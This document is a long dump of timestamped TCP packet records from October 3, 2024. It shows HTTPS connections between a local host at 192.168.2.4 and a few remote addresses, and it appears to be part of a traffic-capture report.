                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.049839020 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.049854994 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.049962997 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.050012112 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.050025940 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.050172091 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.050221920 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.050236940 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.054224014 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.054282904 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.054296970 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.054373980 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.054425001 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.054440022 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.087425947 CEST4434980179.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.136230946 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.136334896 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.136333942 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.136394024 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.136445999 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.136462927 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.136780977 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.136852026 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.136867046 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.136895895 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.136951923 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.137155056 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.137293100 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.137342930 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.137358904 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.137990952 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.138046026 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.138060093 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.138150930 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.138206005 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.138220072 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.138303041 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.138356924 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.138370991 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.138839960 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.138899088 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.138916969 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.138991117 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.139041901 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.139055967 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.139774084 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.139831066 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.139851093 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.139931917 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.139990091 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.140002966 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.222717047 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.222764969 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.222804070 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.222803116 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.222842932 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.222882986 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.223130941 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.223141909 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.223196030 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.223216057 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.223587036 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.223639011 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.223653078 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.223670006 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.223687887 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.224133968 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.224199057 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.224206924 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.224248886 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.224255085 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.224268913 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.224301100 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.224322081 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.224365950 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.224375010 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.224415064 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.225142002 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.225203991 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.225231886 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.225284100 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.226006985 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.226063967 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.226095915 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.226140022 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.226146936 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.226160049 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.226186991 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.226946115 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.227003098 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.227015972 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.227054119 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.227113008 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.227159023 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.227169991 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.227215052 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.250796080 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.309381008 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.309459925 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.309509993 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.309560061 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.309660912 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.309710026 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.309748888 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.309799910 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.309923887 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.309977055 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.310023069 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.310076952 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.310107946 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.310158014 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.310520887 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.310574055 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.310616016 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.310669899 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.310707092 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.310758114 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.310803890 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.311017036 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.311033964 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.311055899 CEST44349802104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.311084986 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.311111927 CEST49802443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.362534046 CEST4434980179.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.362646103 CEST4434980179.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.362809896 CEST49801443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.387028933 CEST49801443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.387068033 CEST4434980179.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.484445095 CEST49804443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.484498024 CEST4434980479.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.484586000 CEST49804443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.487705946 CEST49804443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.487719059 CEST4434980479.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.488368034 CEST49805443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.488434076 CEST4434980579.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.488492012 CEST49805443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.488815069 CEST49805443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.488826990 CEST4434980579.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.784573078 CEST49806443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.784621954 CEST4434980679.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.784686089 CEST49806443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.805507898 CEST49806443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:12.805546999 CEST4434980679.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:13.177269936 CEST4434980479.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:13.178390980 CEST49804443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:13.178405046 CEST4434980479.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:13.179526091 CEST4434980479.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:13.179941893 CEST49804443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:13.180114031 CEST4434980479.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:13.180336952 CEST49804443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:13.191869974 CEST4434980579.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:13.192332029 CEST49805443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:13.192353964 CEST4434980579.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:13.193476915 CEST4434980579.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:13.193794012 CEST49805443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:13.193876028 CEST4434980579.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:13.194215059 CEST49805443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:13.227401972 CEST4434980479.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:13.235440969 CEST4434980579.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:13.461427927 CEST4434980679.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:13.483985901 CEST4434980479.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:13.484190941 CEST4434980479.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:13.484308958 CEST49804443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:13.501559019 CEST4434980579.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:13.501755953 CEST4434980579.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:13.504442930 CEST49805443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:13.540013075 CEST49806443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:13.875583887 CEST49806443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:13.875621080 CEST4434980679.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:13.876410007 CEST4434980679.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:13.877250910 CEST49805443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:13.877270937 CEST4434980579.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:13.878443956 CEST49806443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:13.878541946 CEST4434980679.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:13.878675938 CEST49804443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:13.878699064 CEST4434980479.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:13.888231039 CEST49806443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:13.935401917 CEST4434980679.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.074227095 CEST49807443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.074253082 CEST44349807104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.074315071 CEST49807443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.074522972 CEST49807443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.074533939 CEST44349807104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.085447073 CEST4434980679.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.085552931 CEST4434980679.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.085594893 CEST49806443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.086064100 CEST49806443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.086086035 CEST4434980679.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.205152988 CEST49808443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.205214977 CEST4434980879.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.205293894 CEST49808443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.205944061 CEST49809443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.206051111 CEST44349809104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.206120968 CEST49809443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.206743002 CEST49808443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.206779003 CEST4434980879.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.207134962 CEST49809443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.207170010 CEST44349809104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.302149057 CEST49810443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.302192926 CEST44349810104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.302259922 CEST49810443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.302937031 CEST49810443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.302973032 CEST44349810104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.308963060 CEST49811443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.309003115 CEST4434981179.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.309070110 CEST49811443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.309511900 CEST49811443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.309537888 CEST4434981179.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.311197996 CEST49812443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.311217070 CEST4434981279.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.311275005 CEST49812443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.311604977 CEST49812443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.311621904 CEST4434981279.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.314342022 CEST49813443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.314395905 CEST4434981379.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.314459085 CEST49813443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.314840078 CEST49813443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.314857960 CEST4434981379.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.537976980 CEST44349807104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.538306952 CEST49807443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.538320065 CEST44349807104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.539433956 CEST44349807104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.539913893 CEST49807443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.540075064 CEST49807443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.540082932 CEST44349807104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.587397099 CEST44349807104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.682025909 CEST49807443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.684781075 CEST44349809104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.685029984 CEST49809443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.685095072 CEST44349809104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.685558081 CEST44349809104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.685839891 CEST49809443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.685934067 CEST44349809104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.685956001 CEST49809443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.689441919 CEST44349807104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.689686060 CEST44349807104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.689732075 CEST49807443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.689739943 CEST44349807104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.689838886 CEST44349807104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.689882040 CEST49807443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.689888000 CEST44349807104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.689991951 CEST44349807104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.690036058 CEST49807443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.690042019 CEST44349807104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.690136909 CEST44349807104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.690181017 CEST49807443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.690186024 CEST44349807104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.694906950 CEST44349807104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.694962978 CEST49807443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.694967985 CEST44349807104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.727406979 CEST44349809104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.743906975 CEST49809443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.759668112 CEST44349810104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.759912968 CEST49810443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.759974003 CEST44349810104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.760443926 CEST44349810104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.760757923 CEST49810443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.760853052 CEST44349810104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.760876894 CEST49810443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.775892973 CEST44349807104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.775954962 CEST49807443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.775968075 CEST44349807104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.776078939 CEST44349807104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.776125908 CEST49807443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.776130915 CEST44349807104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.776231050 CEST44349807104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.776273966 CEST49807443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.776278973 CEST44349807104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.776380062 CEST44349807104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.776427984 CEST49807443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.776432037 CEST44349807104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.777055979 CEST44349807104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:14.777101994 CEST49807443192.168.2.4104.18.94.41
